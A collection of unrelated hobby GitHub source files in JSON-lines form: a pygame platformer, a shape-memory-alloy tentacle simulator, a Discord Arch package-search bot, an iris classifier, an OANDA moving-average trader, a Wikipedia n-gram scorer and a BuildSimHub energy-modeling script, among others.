SAVES.readlines()\r\nxS = int(fileS[0])\r\nyS = int(fileS[1])\r\niS = int(fileS[4])\r\nSAVES.close()\r\n\r\nbg = [\"sprites/bg/bg1.png\",\"sprites/bg/bg2.png\"]\r\n\r\n\r\n\r\n# create hero\r\nhero = Player(xS,yS)\r\nleft = right = up =False\r\n\r\n\r\n#Create level\r\nspriteForLVL = [[\r\n'sprites/platform/Tile_31.png',\r\n'sprites/platform/Tile_01.png',\r\n'sprites/platform/Tile_03.png',\r\n'sprites/platform/Tile_02.png',\r\n'sprites/platform/Tile_08.png',\r\n'sprites/platform/Tile_55.png',\r\n'sprites/platform/spike.png',\r\n],\r\n[\r\n'sprites/platform/tile5.png',\r\n'sprites/platform/tile1.png',\r\n'sprites/platform/tile3.png',\r\n'sprites/platform/tile2.png',\r\n'sprites/platform/tile8.png',\r\n'sprites/platform/tile5.png',\r\n'sprites/platform/lava.png',\r\n]]\r\n\r\nsprite_group = pygame.sprite.Group()\r\nplatforms= []\r\n\r\n\r\nx=0.0\r\ny=0\r\ndef CreateLevel(x,y,i):\r\n\twindow.fill((0, 0 , 0))\r\n\tx = 0.0\r\n\ty = 0\r\n\tLenghty = 0\r\n\r\n\tfor row in levels[i]:\r\n\t\tprint(i)\r\n\t\tWidthx = 0\r\n\t\tfor col in row:\r\n\t\t\tif col =='-':\r\n\t\t\t\t\tif levels[i][Lenghty-1][Widthx] != '-' :\r\n\t\t\t\t\t\tif Widthx+1 != len(row) :\r\n\t\t\t\t\t\t\tif (row[Widthx+1] !='-' or row[Widthx+1] =='#') and (row[Widthx-1] !='-' or row[Widthx-1] =='#'):\r\n\t\t\t\t\t\t\t\tblock = Platform(x, 
y,spriteForLVL[i][0])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telif row[Widthx-1] ==' ' or row[Widthx-1] =='#' or row[Widthx-1] =='$':\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][1])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telif row[Widthx+1] ==' ' or row[Widthx+1] =='#' or row[Widthx-1] =='$':\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][2])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][3])\r\n\t\t\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\t\t\tplatforms.append(block)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tblock = Platform(x, y,spriteForLVL[i][5])\r\n\t\t\t\t\t\tsprite_group.add(block)\r\n\t\t\t\t\t\tplatforms.append(block)\t\t\t\t\t\t\r\n\t\t\telif col =='*':\r\n\t\t\t\t\tglass = Platform(x, y+36,spriteForLVL[i][4])\r\n\t\t\t\t\tsprite_group.add(glass)\r\n\t\t\t\t\tplatforms.append(glass)\r\n\t\t\t\t\tglass.collideV = False\r\n\t\t\telif col =='@':\r\n\t\t\t\tactblock = Platform(x, y,'sprites/platform/act.png')\r\n\t\t\t\tsprite_group.add(actblock)\r\n\t\t\t\tplatforms.append(actblock)\r\n\t\t\t\tactblock.actionB = True\r\n\t\t\telif col =='$':\r\n\t\t\t\tcoin =Platform(x, y,'sprites/platform/coin.png')\r\n\t\t\t\tsprite_group.add(coin)\r\n\t\t\t\tplatforms.append(coin)\r\n\t\t\t\tcoin.isItem = True\r\n\t\t\t\tcoin.isCoin = True\r\n\t\t\t\tcoin.collideV = False\r\n\t\t\telif col =='#':\r\n\t\t\t\tspike =Platform(x, y+16,spriteForLVL[i][6])\r\n\t\t\t\tsprite_group.add(spike)\r\n\t\t\t\tplatforms.append(spike)\r\n\t\t\t\tspike.atack = True\r\n\t\t\telif col == \"H\":\r\n\t\t\t\theart = Platform(x, y,'sprites/platform/hurt.png')\r\n\t\t\t\tsprite_group.add(heart)\r\n\t\t\t\tplatforms.append(heart)\r\n\t\t\t\theart.isHeart = True\r\n\t\t\t\theart.isItem = True\r\n\t\t\t\theart.collideV = False\r\n\t\t\telif col =='S':\r\n\t\t\t\tsave =Platform(x, y,'sprites/platform/save.png')\r\n\t\t\t\tsprite_group.add(save)\r\n\t\t\t\tplatforms.append(save)\r\n\t\t\t\tsave.isSave = True\r\n\t\t\t\tsave.collideV = False\r\n\t\t\t\tsave.isItem = True\r\n\t\t\telif col == \"+\":\r\n\t\t\t\tpoution = Platform(x, y,'sprites/platform/poution.png')\r\n\t\t\t\tsprite_group.add(poution)\r\n\t\t\t\tplatforms.append(poution)\r\n\t\t\t\tpoution.isPoution = True\r\n\t\t\t\tpoution.isItem = True\r\n\t\t\t\tpoution.collideV = False\r\n\t\t\telif col == \"→\":\r\n\t\t\t\tNextLevelBlock = Platform(x, y,'sprites/platform/wood.png')\r\n\t\t\t\tsprite_group.add(NextLevelBlock)\r\n\t\t\t\tplatforms.append(NextLevelBlock)\r\n\t\t\t\tNextLevelBlock.isWin = True\r\n\t\t\t\tNextLevelBlock.collideV = False\r\n\t\t\t\tNextLevelBlock.isItem = True\r\n\t\t\telif col == '=':\r\n\t\t\t\tMBlock = Platform(x, y,'sprites/platform/tile9.png')\r\n\t\t\t\tsprite_group.add(MBlock)\r\n\t\t\t\tplatforms.append(MBlock)\r\n\t\t\t\tMBlock.isMoving = True\r\n\t\t\tx += 40.0\r\n\t\t\tWidthx += 1\r\n\t\tLenghty +=1\r\n\t\ty += 40\r\n\t\tx = 0.0\r\n\r\nCreateLevel(x,y,iS)\r\nsprite_group.add(hero)\r\n\r\n#Camera\r\nclass Camera:\r\n\tdef __init__(self, camera_func, width ,height ):\r\n\t\tself.camera_func = camera_func\r\n\t\tself.state = pygame.Rect(0,0,width,height)\r\n\r\n\tdef apply(self, target):\r\n\t\treturn target.rect.move(self.state.topleft)\r\n\r\n\tdef update(self, target):\r\n\t\tself.state = self.camera_func(self.state, target.rect)\r\n\t\t\r\ndef camera_func(camera, 
target_rect):\r\n\tl = -target_rect.x + SIZE[0]/2\r\n\tt = -target_rect.y + SIZE[1]/2\r\n\tw,h = camera.width, camera.height\r\n\r\n\tl = min(0,l)\r\n\tl = max(-(camera.width-SIZE[0]), l)\r\n\tt = max(-(camera.height-SIZE[1]), t)\r\n\tt = min(0,t)\r\n\r\n\treturn pygame.Rect(l,t,w,h)\r\ntotal_level_width = len(levels[iS][0])*40\r\ntotal_level_height = len(levels[iS]) *40\r\n\r\ncamera = Camera(camera_func, total_level_width, total_level_height)\r\n# Fonts\r\npygame.font.init()\r\ninfFont = pygame.font.Font(None,32)\r\n\r\nbackground_image=pygame.image.load(bg[iS]).convert()\r\n\r\ndone = True\r\n\r\ntimer = pygame.time.Clock()\r\n\r\nwhile done:\r\n\tfor e in pygame.event.get():\r\n\t\tif e.type ==pygame.QUIT:\r\n\t\t\tdone = False\r\n\r\n\t\t#KEY Option\r\n\t\tif e.type == pygame.KEYDOWN:\r\n\t\t\tif e.key == pygame.K_LEFT:\r\n\t\t\t\tleft = True\r\n\r\n\t\t\tif e.key == pygame.K_RIGHT:\r\n\t\t\t\tright = True\r\n\t\t\tif e.key == pygame.K_UP:\r\n\t\t\t\tup = True\r\n\r\n\t\tif e.type == pygame.KEYUP:\r\n\t\t\tif e.key == pygame.K_LEFT:\r\n\t\t\t\tleft = False\r\n\t\t\tif e.key == pygame.K_RIGHT:\r\n\t\t\t\tright = False\r\n\t\t\tif e.key == pygame.K_UP:\r\n\t\t\t\tup = False\r\n\r\n\t#FILL SCREEN\r\n\tscreen.fill((0, 0 , 0))\r\n\tscreen.blit(background_image, [1-hero.rect.x*0.1,0])\r\n\t#ADD HERO\r\n\thero.update(left, right,up, platforms)\r\n\tcamera.update(hero)\r\n\tfor e in sprite_group:\r\n\t\tscreen.blit(e.image, camera.apply(e))\r\n\t\t\r\n\t#sprite_group.draw(screen)\r\n\tscreen.blit(infFont.render(u\"Life: %s\" % hero.life,1,(200,200,200)), (SIZE[0]-90,20 ))\r\n\tscreen.blit(infFont.render(u\"Coin: %s\" % hero.coin,1,(200,200,200)), (SIZE[0]-90,SIZE[1]-50 ))\r\n\r\n\tpygame.draw.rect(screen, hero.BarColor, (20, 20, hero.hp,20))\r\n\tif hero.hp <0 and hero.life <=0:\r\n\t\tdone = False\r\n\tif hero.hp < 0:\r\n\t\tSAVES = open(\"saves.txt\", 'r' )\r\n\t\tfileS = SAVES.readlines()\r\n\t\txS = int(fileS[0])\r\n\t\tyS = int(fileS[1])\r\n\t\tiS = int(fileS[4])\r\n\t\tSAVES.close()\r\n\t\thero.life -= 1\r\n\t\thero.rect.x = xS\r\n\t\thero.rect.y = yS\r\n\t\thero.hp = 100\r\n\tif hero.nextLVL == True:\r\n\t\tSAVES = open(\"saves.txt\", 'r' )\r\n\t\tfileS = SAVES.readlines()\r\n\t\t\r\n\t\t\r\n\t\tiS = int(fileS[4])\r\n\t\tSAVES.close()\r\n\t\tfor e in sprite_group:\r\n\t\t\te.kill()\r\n\t\t\r\n\t\tSAVES1 = open(\"saves.txt\", 'w' )\r\n\t\tSAVES1.write(str(56)+ '\\n' + str(56) + '\\n' + str(hero.coin) + '\\n' + str(hero.life) +'\\n' +str(hero.iS))\r\n\t\tSAVES1.close()\r\n\t\tplatforms= []\r\n\t\thero.rect.x = 56\r\n\t\thero.rect.y = 56\r\n\t\tbackground_image=pygame.image.load(bg[iS]).convert()\r\n\t\tCreateLevel(x,y,iS)\r\n\t\tsprite_group.add(hero)\r\n\r\n\t\ttotal_level_width = len(levels[iS][0])*40\r\n\t\ttotal_level_height = len(levels[iS]) *40\r\n\t\tcamera = Camera(camera_func, total_level_width, total_level_height)\r\n\t\tfor e in sprite_group:\r\n\t\t\tscreen.blit(e.image, camera.apply(e))\r\n\r\n\t\thero.nextLVL = False\r\n\r\n\t\t\r\n\r\n\t\r\n\t#Display\r\n\twindow.blit(screen ,(0, 0))\r\n\t#UPDATE\r\n\tpygame.display.flip()\r\n\r\n\ttimer.tick(60)","repo_name":"ApereLieZ/woodcutter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17252728839","text":"__author__ = 'Matthew'\n\nimport math\nimport sma_array as sa\nimport sma_segment as ss\n\nclass Tentacle(object):\n\n # length of lever arm\n r = 35 # unit = mm\n\n # saturation 
values\n min_input = 0\n\n def __init__(self, num_seg=10):\n\n # instance parameters\n self.array = sa.sma_array(num_seg=num_seg)\n self.array.set_all_off()\n #total length of SMA at 90 degree (neutral)\n self.L0 = (ss.sma_segment.hot_length + ss.sma_segment.cold_length)*(num_seg/2)\n\n # Tentacle parameters\n Tentacle.max_input = num_seg\n #Tentacle.r = self.array.get_length_range()/(2*math.cos(math.radians(60)))\n\n\n def get_angle(self, deg=True):\n angle = math.acos((self.L0-self.array.get_total_length())/Tentacle.r)\n\n if deg:\n return math.degrees(angle)\n else:\n return angle\n\n\n def update(self, input_val, num_step=1, sim_step=0.01):\n if input_val < Tentacle.min_input:\n input_val = Tentacle.min_input\n elif input_val > Tentacle.max_input:\n input_val = Tentacle.max_input\n\n self.array.turn_on(input_val, num_step=num_step, sim_step=sim_step)\n\n\n","repo_name":"MattChanTK/SculptureLearning","sub_path":"TentacleControl_Simulation/Tentacle.py","file_name":"Tentacle.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29823868087","text":"#!/usr/bin/env python3\nimport discord\nimport cmds.cmdutils\nfrom cmds.cmdutils import _c\nimport urllib.parse\nimport requests\n\nasync def handle_message(message: discord.Message):\n await message.channel.trigger_typing()\n \n lex = cmds.cmdutils.lex_command(message)\n cmd = _c(lex)\n\n if cmd.query_length == 0:\n await message.channel.send(\"Not enough args!\")\n \n req = requests.get(\"https://archlinux.org/packages/search/json/?q={}&repo=Community&repo=Core&repo=Extra&repo=Multilib\".format(urllib.parse.quote(cmd.content, safe='')))\n json = req.json()\n \n pkgs = []\n\n for pkg in json[\"results\"]:\n pkgs.append(\" ‣ `{}` - {}\\n\".format(pkg[\"pkgname\"], pkg[\"pkgdesc\"]))\n\n try:\n await cmd.st(\"**{} search results for `{}` in Arch Linux**\\n\\n\".format(len(pkgs), cmd.content) + \"\".join(pkgs[:3]))\n except:\n await cmd.st(\"There was an error or your result did not return anything!\")\n\nasync def handle_aur_message(message: discord.Message):\n await message.channel.trigger_typing()\n \n lex = cmds.cmdutils.lex_command(message)\n cmd = _c(lex)\n\n if cmd.query_length == 0:\n await cmd.st(\"Not enough args!\")\n \n req = requests.get(\"https://aur.archlinux.org/rpc/?v=5&type=info&arg={}\".format(urllib.parse.quote(cmd.content, safe='')))\n json = req.json()\n\n print(json)\n \n pkgs = []\n\n for pkg in json[\"results\"]:\n pkgs.append(\" ‣ `{}` - {}\\n\".format(pkg[\"Name\"], pkg[\"Description\"]))\n\n try:\n await cmd.st(\"**{} search results for `{}` in the AUR**\\n\\n\".format(len(pkgs), query) + \"\".join(pkgs[:3]))\n except:\n await cmd.st(\"There was an error or your result did not return anything!\")","repo_name":"pontaoski/unnamed-linux-bot","sub_path":"cmds/pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28936310571","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nread_file = pd.read_csv('iris.csv')\n\ndef input_new_data():\n print(\"Masukkan data baru:\")\n sepallength = float(input(\"sepallength: \"))\n sepalwidth = float(input(\"sepalwidth: \"))\n petallength = float(input(\"petallength: \"))\n petalwidth = float(input(\"petalwidth: \"))\n return [sepallength, sepalwidth, petallength, petalwidth]\n\ndef calculate_score(data, averages):\n return 
sum([a*b for a,b in zip(data, averages)])\n\ndef predict_species(new_data, training_data, averages):\n new_score = calculate_score(new_data, averages)\n closest_distance = float('inf')\n nearest_species = None\n \n for index, row in training_data.iterrows():\n existing_data = row[:-1].tolist()\n species = row['class']\n existing_score = calculate_score(existing_data, averages)\n distance = abs(new_score - existing_score)\n if distance < closest_distance:\n closest_distance = distance\n nearest_species = species\n\n return nearest_species\n\nX = read_file.iloc[:, :-1]\ny = read_file.iloc[:, -1]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=True)\n\ntraining_data = pd.concat([X_train, y_train], axis=1)\naverages = X_train.mean().tolist()\n\nwhile True:\n new_data = input_new_data()\n predicted_species = predict_species(new_data, training_data, averages)\n print(f'Hasil prediksi untuk data baru: {predicted_species}')\n \n new_row = pd.Series(new_data + [predicted_species], index=read_file.columns)\n read_file = pd.concat([read_file, new_row.to_frame().T], ignore_index=True)\n \n read_file.to_csv('iris.csv', index=False)\n continue_input = input(\"Apakah ingin memasukkan data baru lagi? (y/n): \")\n if continue_input.lower() != 'y':\n break","repo_name":"Ramadhanputra1121/Assignment-2-PKB","sub_path":"predictOnly.py","file_name":"predictOnly.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22027042881","text":"# -*- coding: utf-8 -*-\r\nimport numpy\r\nimport tpqoa\r\n\r\ninstrument = 'EUR_USD'\r\n\r\nclass SMATrader(tpqoa.tpqoa):\r\n def __init_(self,config_file, SMA1, SMA2, bar_length, units):\r\n super(SMATrader, self).__init__(config_file)\r\n self.raw = pd.DataFrame()\r\n \r\n self.sma1 = SMA1\r\n self.sma2 = SMA2\r\n self.min_length = SMA2 + 1\r\n self.bar_length = bar_length\r\n self.position = 0\r\n \r\n def on_success(self,time,bid,ask,bar_length, ticks):\r\n print(self.ticks, end = ' ')\r\n self.raw = self.raw.append(pd.DataFrame({'bid':bid, 'ask':ask},index=[pd.Timestamp(time)]))\r\n self.data = self.raw.resample(self.bar_length, label='right').last() \r\n self.data['mid'] = self.data.mean(axis=1)\r\n \r\n if len(self.data) > self.min_length:\r\n if self.position in [0,-1]:\r\n self.min_length += 1\r\n self.data['SMA1'] = self.data['mid'].rolling(self.SMA1).mean()\r\n self.data['SMA2'] = self.data['mid'].rolling(self.SMA2).mean()\r\n\r\n if self.data['SMA1'].iloc[-2] > self.data['SMA2'].iloc[-2]: # this is because the last number might actually not be the right one\r\n print(55 * '=')\r\n print(\"Buy order ...\")\r\n print(55 * '=')\r\n self.create_order(self.stream_instrument, units = ( 1 - self.position )*self.units)\r\n self.position = 1\r\n ### this is where you place your trade\r\n api.create_order(instrument, units=50)\r\n elif self.position in [0,1]:\r\n if self.data['SMA1'].iloc[2] < self.data['SMA2'].iloc[-2]:\r\n print(55 * '=')\r\n print(\"Sell order ...\")\r\n print(55 * '=')\r\n self.create_order(self.stream_instrument, units = -( 1 + self.position )*self.units)\r\n self.position = -1 \r\n \r\n \r\nsma = SMATrader('oanda.cfg',5, 10, '5s', 200)\r\nsma.stream_data(instrument, 
stop=150)\r\nsma.print_transactions(tid=0)\r\nsma.get_transactions(tid=0)","repo_name":"EdenHouseDevelopment/cqf_course","sub_path":"SMATrader.py","file_name":"SMATrader.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18689156554","text":"import click\nfrom GLOBAL_VARIABLES import DATABASE_LOCATION, FOLDER_PLOT_DUMP\nfrom db_api.plots.profit_rate import profit_rate\nimport subprocess\n\n\n@click.command()\n@click.argument('buyin', required=False, default=None)\ndef show_profit_rate(buyin):\n plot_name = profit_rate(\n buyin=buyin,\n save_to=FOLDER_PLOT_DUMP,\n database_file_path=DATABASE_LOCATION\n )\n filepath__ = FOLDER_PLOT_DUMP + plot_name\n subprocess.call(['open', filepath__])\n","repo_name":"michaelcukier/Poker-Hand-Tracker","sub_path":"cli_commands/show_profit_rate.py","file_name":"show_profit_rate.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"42644292330","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFunctions for:\n1) generating character n-grams from Wikipedia pages, to find most frequent n-grams later on;\n2) matching most frequent n-grams in a text and finding coverage [%], as an indicator of text quality.\n\nUsage from a folder where \"nifty\" package is visible:\n\n1) python -m nifty.algo.ngrammer wikipedia pl 10 10000000 > ngrams_pl_10.txt\n cat ngrams_pl_10.txt | env LC_ALL=C sort | uniq -c | sort -n\n cat ngrams_it_10.txt | env LC_ALL=C sort | uniq -c | sort -nr | head -n300000 > freq_ngrams_it_10.txt\n\n2) python -m nifty.algo.ngrammer score document.txt ...\n\n\nThis code is compatible with Python 2 & 3.\n\n@author: Marcin Wojnarski\n@contact: mwojnars@ns.onet.pl\n\"\"\"\n\n\nfrom __future__ import print_function\nimport os, sys, re, random, unicodedata, chardet, click\nfrom itertools import islice\nfrom collections import namedtuple\nfrom six.moves import urllib\nfrom glob import glob\n\nif __name__ != \"__main__\":\n from ..text import merge_spaces, html2text_smart\nelse:\n from nifty.text import merge_spaces, html2text_smart\n\n\nPY3 = (sys.version_info.major >= 3)\n\nPATH = os.path.dirname(__file__) + '/'\n\nRE = re.compile\n\n\n#####################################################################################################################################################\n#####\n##### WIKIPEDIA SCRAPING & NGRAMS EXTRACTION\n#####\n\nclass Wikipedia(object):\n \"\"\"\n Scraper of Wikipedia pages.\n \"\"\"\n \n @classmethod\n def get_random_page(cls, lang = 'pl'):\n \n resp = urllib.request.urlopen('http://%s.wikipedia.org/wiki/Special:Random' % lang)\n status = getattr(resp, 'status', None) or getattr(resp, 'code')\n if status == 200:\n return resp.read()\n else:\n raise Exception(\"Failed to open page, status code: %s\" % resp.status)\n \n @classmethod\n def stream_pages(cls, lang = 'pl'):\n \n while True:\n try:\n page = cls.get_random_page(lang)\n enc = chardet.detect(page)['encoding']\n page = page.decode(enc)\n yield page\n \n except Exception as ex:\n print(ex)\n \n \n @classmethod\n def stream_plaintext(cls, lang = 'pl', truncate = True,\n _frame = RE(r'(?uis)^.*|.*$'),\n _script = RE(r'(?uis)]*)?>.*?'),\n _style = RE(r'(?uis)]*)?>.*?'),\n _mw_cat = RE(r'(?uis)]*\\bcatlinks\\b.*'), # MediaWiki categories box\n _mw_nav = RE(r'(?uis)]*mw-data-after-content.*'), # MediaWiki navigation box (left panel) and footer\n _block = RE(r'(?uis)|||'),\n 
_latin = RE(r'(?uis)[a-zA-Z\\d\\{\\}/\\\\\\&|\\.,;*\\-' u'–°' r']+|\\(\\s*\\)'),\n _brackets = RE(r'(?uis)\\[.*?\\]|\\(\\s*\\)'),\n ):\n \n def as_plaintext(block):\n text = html2text_smart(block)\n text = _brackets.sub(' ', text)\n \n if lang in ('zh','jp'):\n text = _latin.sub('', text)\n \n text = merge_spaces(text)\n\n return text\n \n for page in cls.stream_pages(lang):\n \n #print(page)\n #print('---' * 30)\n \n if truncate:\n page = _frame .sub(' ', page)\n page = _script.sub(' ', page)\n page = _style. sub(' ', page)\n page = _mw_cat.sub(' ', page)\n page = _mw_nav.sub(' ', page)\n \n texts = map(as_plaintext, _block.findall(page))\n texts = filter((lambda t: len(t) > 1), texts)\n \n yield '\\n'.join(texts)\n\n\n @classmethod\n def stream_blocks(cls, lang = 'pl', min_len_block = 100, drop_biblio = True,\n _biblio = RE(r'(?uis)^\\s*' u'\\u2191' r'.*|^\\s*\\^.*'), # ↑ ^ ..... (bibliography entries)\n ):\n \n for text in cls.stream_plaintext(lang):\n \n for block in text.split('\\n'):\n if None != min_len_block > len(block): continue\n if drop_biblio and _biblio.match(block): continue\n yield block\n \n\n @classmethod\n def stream_ngrams(cls, lang, length, limit = None, *args, **kwargs):\n \n length = int(length)\n if limit: limit = int(limit)\n \n count = 0\n for block in cls.stream_blocks(lang, *args, **kwargs):\n block = block.lower()\n for i in range(len(block)-length+1):\n yield block[i:i+length]\n count += 1\n if count % 1000 == 0: print(count, file = sys.stderr)\n if None != limit <= count: return\n \n\n#####################################################################################################################################################\n#####\n##### TEXT SCORING\n#####\n\nclass Scorer(object):\n \"\"\"\n In method score(), Scorer takes a text and finds in it all overlapping matches of frequent n-grams (loaded in __init__),\n to calculate: (1) the fraction of text matched (after lowercase + spaces merged); (2) no. 
of different unique n-grams matched.\n \"\"\"\n \n verbose = True\n \n def __init__(self, minfreq = 50, lang = '*', length = '*', path = PATH + \"ngrams/\"):\n \n # filtering out strings like:\n # athbf {x} \\mathbf {x\n # \\color {gr r {gray}{0 &\\color {g {gray}{0}&\n # {\\displays playstyle aystyle {\\ style \\mat\n # \\operatorn 0 0 0 0 0 x • xi • x\n re_invalid = RE(r\"\\\\mat|\\\\col|\\\\disp|\\\\oper|\\{|\\}|\\&\\\\|displayst|aystyle|0 0 0|\" u\"x • x|codec can't decode\")\n \n def invalid(s):\n return re_invalid.search(s)\n \n if self.verbose: print(\"Loading frequent n-grams (phrases)...\")\n \n filenames = glob(path + \"freq_ngrams_%s_%s.txt\" % (lang, length))\n if not filenames: raise Exception(\"No file with ngrams found\")\n \n phrases = []\n for fn in filenames:\n \n target_len = int(fn.rsplit('.',1)[0].rsplit('_',1)[1])\n f = open(fn, 'rt')\n \n for line in f:\n if not PY3: line = line.decode('utf-8')\n line = line.lstrip()\n if line[-1] == '\\n': line = line[:-1]\n if not line: continue\n assert ' ' in line\n \n split = line.index(' ')\n freq = int(line[:split])\n ngram = line[split+1:]\n if len(ngram) != target_len:\n if \"codec can't decode\" not in ngram:\n print(\"INCORRECT LENGTH (%s): [%s]\" % (len(ngram), ngram))\n else: \n assert len(ngram) == target_len\n \n if freq < minfreq: continue\n if invalid(ngram): continue\n \n phrases.append(ngram)\n #print(freq, '[%s]' % ngram)\n \n if self.verbose: print(\"Phrases (with duplicates): \", len(phrases))\n phrases = set(phrases)\n if self.verbose: print(\"Phrases (no duplicates): \", len(phrases))\n\n if self.verbose: print(\"Building regex pattern...\")\n phrases = map(re.escape, phrases)\n self.re_phrases = RE(\"(?iu)(?=(%s))\" % \"|\".join(phrases)) # standard re.compile() works 2-3x faster than regex.compile() that allows overlapped=True in finditer()\n #print(self.re_phrases.pattern)\n\n def score(self, text):\n \n text = text.lower()\n text = merge_spaces(text)\n total_matched = 0\n unique = set()\n \n last = 0\n for match in self.re_phrases.finditer(text):\n phrase = match.group(1)\n start = match.start() # we look for OVERLAPPING matches! 
for this reason, we use lookahead matches in the regex and the actual match returned is always 0-length\n stop = start + len(phrase) # we need to take group(1) - from inside the lookahead match - to retrieve the length of the matched substring\n unique.add(phrase)\n if start < last: start = last\n assert start < stop\n \n if self.verbose:\n click.secho(text[last:start], nl = False)\n click.secho(text[start:stop], nl = False, bg = 'blue')\n \n total_matched += stop - start\n last = stop\n \n if self.verbose: click.secho(text[last:])\n \n #matches = self.re_phrases.findall(text)\n #total_matched = sum(map(len, matches))\n total_len = len(text)\n \n if self.verbose: print(\"Matched characters: %s of %s\" % (total_matched, total_len))\n return float(total_matched) / total_len, len(unique)\n\n\n#####################################################################################################################################################\n#####\n##### MAIN\n#####\n\nif __name__ == '__main__':\n\n cmd = sys.argv[1]\n \n if cmd == 'wikipedia':\n \n for ngram in Wikipedia.stream_ngrams(*sys.argv[2:]):\n print(ngram if PY3 else ngram.encode('utf-8'))\n \n elif cmd == 'score':\n \n scorer = Scorer()\n for fname in sys.argv[2:]:\n text = open(fname).read()\n if not PY3: text = text.decode('utf-8')\n print(\"Matching...\")\n score, unique = scorer.score(text)\n print(\"%.2f%% matched (%d unique frequent n-grams)\" % (score * 100, unique), '-', fname)\n \n else:\n print(\"Unknown command:\", cmd)\n \n \n","repo_name":"mwojnars/nifty","sub_path":"algo/ngrammer.py","file_name":"ngrammer.py","file_ext":"py","file_size_in_byte":10087,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"5636456018","text":"#!/usr/bin/env python3\n#\n# problem statement:\n#\n# The prime factors of 13195 are 5, 7, 13 and 29.\n#\n# What is the largest prime factor of the number 600851475143 ?\n\n#import pprint # pprint.pprint([\"hello\", \"world\"])\nimport math\n\ndef is_prime(x):\n for factor in range(2,int(math.sqrt(x))+1):\n if x % factor == 0:\n return False\n #print(factor)\n return True\n\n\nsum = 0\nfactor_me = 600851475143\nfor factor in range(3, 775147): # sqrt(600851475143)\n if factor % 3 == 0 or factor % 5 == 0 or factor % 7 == 0:\n next\n if factor_me % factor == 0 and is_prime(factor):\n print(factor)\n\n\n\n\n\n\n","repo_name":"DeeNewcum/learn_python","sub_path":"project_euler/pe3.py","file_name":"pe3.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13890035065","text":"\"\"\"\nThis file contains a workflow for modeling cycle # 1 in ASHRAE Standard 209:\nEnergy Simulation Aided Design for Buildings except Low-Rise Residential Buildings (ANSI Approved)\n\nModeling cycle 1 analysis:\nCreate energy models to calculate annual building energy by end use and peak heating and cooling loads with identical\nHVAC systems. Perform a sensitivity analysis by varying the following building characteristics:\na. Building geometry\nb. Window-to-wall ratio, by orientation, and shading options\n(if applicable)\nc. Orientation\nd. Thermal performance of the envelope and structure\n\nHow to use this python script:\n1. Get a BuildSimHub account - it is free of charge and you can get 2 free simulation hours\n by following the walk-through. https://my.buildsim.io/register.html\n2. Download the API package from GITHUB\n3. 
Copy the project_api_key from your demo project / any new projects and paste it to the project_api_key\n4. Copy a whole building model from the model library (List of PNNL reference and IECC models)\n5. Copy the model_api_key and paste to the variable: model_api_key\n6. Define parameters in the lists under model_api_key\n7. Run the script!\nYou are done\n\nAuthor: Weili Xu\nDate: 4/25/2018\n\n\"\"\"\n\nimport BuildSimHubAPI as bsh_api\nimport BuildSimHubAPI.postprocess as pp\n\n# paste your BuildSimHub project api key here:\nproject_api_key = \"b2809d88-847d-474e-91a5-8763b6b81a27\"\n# paste your BuildSimHub model api key here:\nmodel_api_key = \"babac3ee-9fd0-4d62-8f5d-6fd706492607\"\n# fill in your investigation values\nbldg_orientation = []\nwwr_south = [0.2, 0.6]\nwwr_north = []\nwwr_east = []\nwwr_west = [0.3, 0.4]\noverhang_south = []\noverhang_north = []\noverhang_east = []\noverhang_west = []\nfin_south = []\nfin_north = []\nfin_west = []\nfin_east = []\nwall_rvalue = [10, 30]\nwall_unit = \"ip\"\nroof_rvalue = []\nroof_unit = \"ip\"\nwindow_uvalue = []\nwindow_u_unit = 'ip'\nwindow_shgc = []\n\n\"\"\"\nBelow are the standard API code - You don't need to touch the code below\nunless you want to process different types of results than this script.\n\n\"\"\"\n# Create a new parametric job\nbsh = bsh_api.BuildSimHubAPIClient()\nnew_pj = bsh.new_parametric_job(project_api_key, model_api_key)\n\nmeasures = list()\n\n# Define EEMs\norientation = bsh_api.measures.BuildingOrientation()\norientation.set_datalist(bldg_orientation)\nmeasures.append(orientation)\n\nwwrs = bsh_api.measures.WindowWallRatio('s')\nwwrs.set_datalist(wwr_south)\nmeasures.append(wwrs)\n\nwwrn = bsh_api.measures.WindowWallRatio('n')\nwwrn.set_datalist(wwr_north)\nmeasures.append(wwrn)\n\nwwrw = bsh_api.measures.WindowWallRatio('w')\nwwrw.set_datalist(wwr_west)\nmeasures.append(wwrw)\n\nwwre = bsh_api.measures.WindowWallRatio('e')\nwwre.set_datalist(wwr_east)\nmeasures.append(wwre)\n\noverhangn = 